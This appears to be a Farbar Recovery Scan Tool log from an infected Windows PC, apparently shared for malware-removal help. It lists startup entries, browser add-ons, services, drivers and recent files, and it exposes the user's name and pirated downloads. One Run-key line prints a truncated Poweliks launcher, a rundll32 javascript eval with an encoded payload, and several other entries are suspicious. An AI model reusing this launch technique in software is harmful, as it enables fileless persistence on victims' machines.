HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [1666432 2014-05-22] (Simply Super Software)
Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [googletalk] => C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [GoogleChromeAutoLaunch_7658F97A8AE129BDD15C9751079A5083] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [860488 2014-08-06] (Google Inc.)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [21653096 2014-07-24] (Skype Technologies S.A.)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [Dailtyqovoyxivw] => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ShareOverlay -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
ShellIconOverlayIdentifiers-x32: ShareOverlay -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.conduit.com?SearchSource=10&CUI=UN47387223475202034&UM=2&ctid=CT3289663
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://samsung13.msn.com
SearchScopes: HKLM - DefaultScope {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS
SearchScopes: HKLM - {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS
SearchScopes: HKLM-x32 - DefaultScope {01B8D119-40DC-43D4-9D14-59FB6904AF1A} URL = 
SearchScopes: HKLM-x32 - {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS
SearchScopes: HKCU - DefaultScope {01B8D119-40DC-43D4-9D14-59FB6904AF1A} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3289663&CUI=UN47387223475202034&UM=2
SearchScopes: HKCU - {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = 
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll (IvoSoft)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll (IvoSoft)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 71.252.0.12
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\Program Files\Microsoft Office\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: intel.com/AppUp -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp.dll (Intel)
FF Plugin HKCU: intel.com/AppUpx64 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)
FF Plugin HKCU: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn [2014-08-23]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFFPlgn
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFFPlgn [2012-12-27]
 
Chrome: 
=======
CHR HomePage: hxxp://samsung13.msn.com/
CHR StartupUrls: "hxxp://www.google.com/"
CHR NewTab: "chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\pdf.dll ()
CHR Extension: (Duolingo) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiahmijlpehemcpleichkcokhegllfjl [2013-09-01]
CHR Extension: (Xmarks Bookmark Sync) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2012-12-29]
CHR Extension: (Google Drive) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-27]
CHR Extension: (Norton Security Toolbar) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\bejnhdlplbjhffionohbdnpcbobfejcc [2014-05-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (YouTube) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-27]
CHR Extension: (Linkification) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\cflchafndefoljnhhholeekfpgmbphaf [2012-12-29]
CHR Extension: (Google Search) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-27]
CHR Extension: (GameWeasel) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\emhdohhdhpcobeiikcekeioeonmedanp [2012-12-29]
CHR Extension: (Marlies Dekkers) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\fepnljgdbelppefncogilfbjikmnbhjm [2012-12-29]
CHR Extension: (TweetDeck by Twitter) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbdpomandigafcibbmofojjchbcdagbl [2012-12-29]
CHR Extension: (Feedly - News, Blogs and Youtube) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipbfijinpcgfogaopmgehiegacbhmob [2013-04-18]
CHR Extension: (Kindle Cloud Reader) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\icdipabjmbhpdkjaihfjoikhjjeneebd [2013-05-26]
CHR Extension: (Vigenère cipher) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\jefmgpafeddooefhpnhccodndbcpbmhj [2014-08-14]
CHR Extension: (Speed Dial 2) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2012-12-29]
CHR Extension: (WordPress.com) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\khjnjifipfkgglficmipimgjpbmlbemd [2012-12-29]
CHR Extension: (Download Master) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcceagdollnkjlogmdckgjakjapmkdjf [2012-12-29]
CHR Extension: (SoundCloud mp3 Download) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlinbfdlnkjpimeeeeodegeibkkekboe [2013-12-11]
CHR Extension: (Text to Image) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanbapcfdoomkfoomlmiaaflmkaiiedd [2012-12-29]
CHR Extension: (Google Wallet) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-25]
CHR Extension: (Gmail) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-27]
CHR Extension: (WordPress.com Extension) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnbbfhcegldppmibabepjfjloachnmjb [2012-12-29]
CHR HKCU\...\Chrome\Extension: [nemfjadlboooiffmcelkafilagddogim] - C:\Users\Stephen\AppData\Local\CRE\nemfjadlboooiffmcelkafilagddogim.crx [2013-06-09]
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\Exts\Chrome.crx [2014-05-01]
CHR HKLM-x32\...\Chrome\Extension: [nemfjadlboooiffmcelkafilagddogim] - C:\Users\Stephen\AppData\Local\CRE\nemfjadlboooiffmcelkafilagddogim.crx [2013-06-09]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ClassicShellService; C:\Program Files\Classic Shell\ClassicShellService.exe [68608 2012-12-29] (IvoSoft) [File not signed]
R2 Easy Launcher; C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe [1593976 2012-09-05] (Samsung Electronics CO., LTD.)
R2 ExpressCache; C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe [102224 2012-08-17] (Condusiv Technologies)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 irstrtsv; C:\windows\SysWOW64\irstrtsv.exe [193576 2012-07-19] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273136 2013-08-28] ()
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe [144368 2013-05-21] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [3943104 2012-08-14] (Symantec Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [14920 2013-01-28] (Microsoft Corporation)
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [619904 2012-12-11] (Wacom Technology, Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3378416 2013-08-28] (Intel® Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20130208.001\BHDrvx64.sys [1388120 2013-01-15] (Symantec Corporation)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [202752 2012-07-25] (Microsoft Corporation)
R1 ccSet_NARA; C:\Windows\system32\drivers\NARAx64\0401000.00E\ccSetx64.sys [168608 2012-05-25] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1405000.01C\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484512 2013-02-11] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [138912 2012-12-27] (Symantec Corporation)
R1 excfs; C:\Windows\System32\DRIVERS\excfs.sys [23376 2012-08-17] (Condusiv Technologies)
R0 excsd; C:\Windows\System32\DRIVERS\excsd.sys [103248 2012-08-17] (Condusiv Technologies)
R3 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20130222.001\IDSvia64.sys [513184 2012-12-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\drivers\irstrtdv.sys [43800 2012-07-20] (Intel Corporation)
S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20130223.009\ENG64.SYS [126192 2013-02-11] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20130223.009\EX64.SYS [2087664 2013-02-11] (Symantec Corporation)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3345376 2013-10-08] (Intel Corporation)
R3 RadioHIDMini; C:\Windows\System32\drivers\RadioHIDMini.sys [23408 2012-07-27] (Windows ® Win 7 DDK provider)
S3 rtport; C:\windows\SysWOW64\drivers\rtport.sys [15144 2012-11-28] (Windows ® 2003 DDK 3790 provider)
S3 SRTSP; C:\Windows\System32\Drivers\NISx64\1405000.01C\SRTSP64.SYS [796760 2013-05-16] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1405000.01C\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1405000.01C\SYMDS64.SYS [493656 2013-05-21] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1405000.01C\SYMEFA64.SYS [1139800 2013-05-23] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NISx64\1405000.01C\SymELAM.sys [23448 2012-06-20] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-06-18] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1405000.01C\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1405000.01C\SYMNETS.SYS [433752 2013-04-24] (Symantec Corporation)
S3 SBIOSIO; \??\C:\Windows\Temp\SBIOSIO64.SYS [X]
S3 TVICPORT; \??\C:\windows\system32\DRIVERS\TVICPORT.SYS [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 13:40 - 2014-08-23 13:41 - 00025551 _____ () C:\Users\Stephen\Desktop\FRST.txt
2014-08-23 13:39 - 2014-08-23 13:40 - 00000000 ____D () C:\FRST
2014-08-23 13:39 - 2014-08-23 13:39 - 02103296 _____ (Farbar) C:\Users\Stephen\Downloads\FRST64.exe
2014-08-23 13:26 - 2014-08-23 13:27 - 00290576 _____ () C:\windows\Minidump\082314-36093-01.dmp
2014-08-23 13:25 - 2014-08-23 13:25 - 00002560 _____ () C:\Users\Stephen\AppData\Local\A09170451A.exe
2014-08-23 13:24 - 2014-08-23 13:24 - 02103296 _____ (Farbar) C:\Users\Stephen\Desktop\FRST64.exe
2014-08-23 12:58 - 2014-08-23 12:58 - 00005244 _____ () C:\Users\Stephen\Desktop\attach.txt
2014-08-23 12:58 - 2014-08-23 12:57 - 00015909 _____ () C:\Users\Stephen\Desktop\dds.txt
2014-08-23 12:38 - 2014-08-23 12:38 - 00000000 ___SH () C:\DkHyperbootSync
2014-08-23 12:29 - 2014-08-23 12:31 - 00688992 ____R (Swearware) C:\Users\Stephen\Downloads\dds (1).com
2014-08-23 12:29 - 2014-08-23 12:31 - 00688992 _____ (Swearware) C:\Users\Stephen\Downloads\dds.com
2014-08-23 11:43 - 2013-03-05 19:07 - 00692568 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2014-08-23 11:43 - 2013-03-05 19:07 - 00078168 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-08-23 11:17 - 2014-08-23 11:17 - 00430728 _____ () C:\windows\system32\FNTCACHE.DAT
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel PROSet Wireless
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ____D () C:\Program Files (x86)\Cisco
2014-08-23 09:07 - 2014-08-23 09:08 - 00000000 ____D () C:\ProgramData\Intel.sav
2014-08-22 20:11 - 2014-01-19 03:38 - 00270496 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
2014-08-22 16:16 - 2013-08-07 01:15 - 00144896 _____ (Microsoft Corporation) C:\windows\system32\tssdisai.dll
2014-08-22 14:40 - 2014-08-22 14:40 - 00007605 _____ () C:\Users\Stephen\AppData\Local\Resmon.ResmonCfg
2014-08-22 12:39 - 2014-08-23 13:26 - 580607022 _____ () C:\windows\MEMORY.DMP
2014-08-22 12:39 - 2014-08-22 12:40 - 00286552 _____ () C:\windows\Minidump\082214-25421-01.dmp
2014-08-22 12:38 - 2014-08-22 12:38 - 00002560 _____ () C:\Users\Stephen\AppData\Local\53534DF0.exe
2014-08-22 09:01 - 2014-08-22 09:01 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-08-22 08:53 - 2014-08-22 08:53 - 02347384 _____ (ESET) C:\Users\Stephen\Desktop\esetsmartinstaller_enu.exe
2014-08-22 04:00 - 2014-08-22 04:27 - 00002146 _____ () C:\Users\Stephen\Desktop\Rkill.txt
2014-08-22 04:00 - 2014-08-22 04:00 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill64-2137.exe
2014-08-22 03:51 - 2014-08-22 03:53 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill.exe
2014-08-22 02:58 - 2014-08-22 02:59 - 00000000 ____D () C:\Users\Stephen\Desktop\New folder (4)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (3)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (2)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder
2014-08-22 01:34 - 2014-08-22 01:35 - 00910000 _____ () C:\Users\Stephen\Downloads\MicrosoftSystemScan_db9dee88-9091-4047-a2a0-bf19e4fd7a5d.exe
2014-08-22 01:25 - 2014-05-14 21:02 - 00059424 _____ (Microsoft Corporation) C:\windows\system32\wuauclt.exe
2014-08-22 01:25 - 2014-05-14 18:43 - 03286528 _____ (Microsoft Corporation) C:\windows\system32\wuaueng.dll
2014-08-22 01:25 - 2014-05-14 18:43 - 01623040 _____ (Microsoft Corporation) C:\windows\system32\wucltux.dll
2014-08-22 01:25 - 2014-05-14 18:43 - 00253440 _____ () C:\windows\system32\WUSettingsProvider.dll
2014-08-22 01:25 - 2014-05-14 18:42 - 00176640 _____ (Microsoft Corporation) C:\windows\system32\storewuauth.dll
2014-08-22 01:21 - 2013-08-16 01:21 - 00049152 _____ (Microsoft Corporation) C:\windows\system32\wups2.dll
2014-08-21 19:00 - 2014-08-21 19:00 - 00002776 _____ () C:\windows\System32\Tasks\CCleanerSkipUAC
2014-08-21 19:00 - 2014-08-21 19:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-08-21 18:59 - 2014-08-21 19:00 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-21 18:40 - 2014-08-21 18:41 - 04813544 _____ (Piriform Ltd) C:\Users\Stephen\Downloads\ccsetup416.exe
2014-08-21 16:08 - 2014-08-21 16:10 - 00000000 ____D () C:\NPE
2014-08-21 16:01 - 2014-08-21 17:28 - 00000000 ____D () C:\Users\Stephen\AppData\Local\NPE
2014-08-21 15:58 - 2014-08-21 16:01 - 03077584 ____N (Symantec Corporation) C:\Users\Stephen\Downloads\npe.exe
2014-08-21 13:06 - 2014-08-21 13:06 - 00000000 _____ () C:\Users\Stephen\Downloads\FixNecurs64bit.log
2014-08-21 13:04 - 2014-08-21 13:05 - 05818744 _____ (Symantec Corporation) C:\Users\Stephen\Downloads\FixNecurs64bit.exe
2014-08-21 13:03 - 2014-08-21 13:03 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Stephen\Downloads\tdsskiller.exe
2014-08-21 13:02 - 2014-08-21 13:02 - 00277328 _____ (ESET) C:\Users\Stephen\Downloads\ESETZBotZRCleaner.exe
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\Users\Stephen\Documents\Simply Super Software
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\ProgramData\Licenses
2014-08-21 12:38 - 2014-08-21 12:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2014-08-21 12:36 - 2014-08-21 12:38 - 00000000 ____D () C:\Program Files (x86)\Trojan Remover
2014-08-21 12:36 - 2014-08-21 12:36 - 00000000 ____D () C:\ProgramData\Simply Super Software
2014-08-21 12:33 - 2014-08-21 12:33 - 21657592 _____ (Simply Super Software ) C:\Users\Stephen\Downloads\trjsetup.exe
2014-08-21 11:48 - 2014-08-23 13:00 - 00000840 _____ () C:\windows\Tasks\Security Center Update - 436866125.job
2014-08-21 11:48 - 2014-08-21 11:48 - 00003816 _____ () C:\windows\System32\Tasks\Security Center Update - 436866125
2014-08-20 22:58 - 2014-08-20 22:59 - 30517960 _____ (Microsoft Corporation) C:\Users\Stephen\Downloads\Windows-KB890830-x64-V5.15.exe
2014-08-20 16:22 - 2014-08-23 13:00 - 00000842 _____ () C:\windows\Tasks\Security Center Update - 406261607.job
2014-08-20 16:22 - 2014-08-20 16:22 - 00003818 _____ () C:\windows\System32\Tasks\Security Center Update - 406261607
2014-08-20 16:18 - 2014-08-21 11:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-08-20 16:12 - 2014-08-20 16:12 - 00015817 _____ () C:\Users\Stephen\Downloads\122GRJ605.torrent
2014-08-17 23:31 - 2014-08-17 23:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-17 23:30 - 2014-08-17 23:31 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-17 23:30 - 2014-08-17 23:31 - 00000000 ____D () C:\Program Files\iTunes
2014-08-17 23:30 - 2014-08-17 23:31 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-08-17 23:30 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files\iPod
2014-08-14 14:56 - 2014-08-14 14:56 - 00007488 _____ () C:\Users\Stephen\Downloads\English - Al Bhed Translator with Phonetics.htm
2014-08-12 21:43 - 2014-08-12 21:43 - 22726310 _____ () C:\Users\Stephen\Downloads\ROBO BLAST.mp4
2014-08-11 20:31 - 2014-08-11 20:34 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook (1991) [1080p]
2014-08-11 20:31 - 2014-08-11 20:31 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook.1991.720p.BRRip.x264.AC3-REKD
2014-08-11 20:09 - 2014-08-11 21:06 - 00000000 ____D () C:\Users\Stephen\Downloads\Death.To.Smoochy.2002.720p.HDTV.x264.AC3-REKD
2014-08-11 20:08 - 2014-08-12 00:35 - 00000000 ____D () C:\Users\Stephen\Downloads\Super Mario Brothers [1993]-XviD -DVDRip-KaOsUSC (Kingdom-Release)
2014-08-11 19:58 - 2014-08-11 19:58 - 00019985 _____ () C:\Users\Stephen\Downloads\Super_Mario_Brothers_Movie_x-demonoid.ph-x_8656776.1006.torrent
2014-08-10 11:23 - 2014-08-10 11:29 - 37064000 _____ () C:\Users\Stephen\Downloads\rpgtoolkit321.zip
